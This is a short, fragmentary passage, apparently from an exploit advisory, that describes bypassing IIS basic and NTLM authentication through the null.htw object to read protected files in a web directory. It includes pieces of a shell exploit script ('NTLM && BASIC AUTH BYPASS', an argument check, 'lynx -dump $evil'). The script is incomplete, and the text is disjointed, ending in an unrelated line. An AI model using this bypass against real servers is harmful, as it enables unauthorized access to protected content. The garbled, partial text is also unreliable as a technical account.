But you can protect your web contents by the Internet Information basic/ntlm autentication, then this will be bypassed with null.htw object.
Both authentications seem be the same, but really the object null.htw let users get any file in web directory, only if it is protected by the filesystem, will be secure.
In the exploit you can see how to use the null.htw object.
# NTLM && BASIC AUTH BYPASS :)
# Based on my adv: http://www.securityfocus.com/bid/24105/info
if [ $# != 2 ]
lynx -dump $evil
Is hard to believe.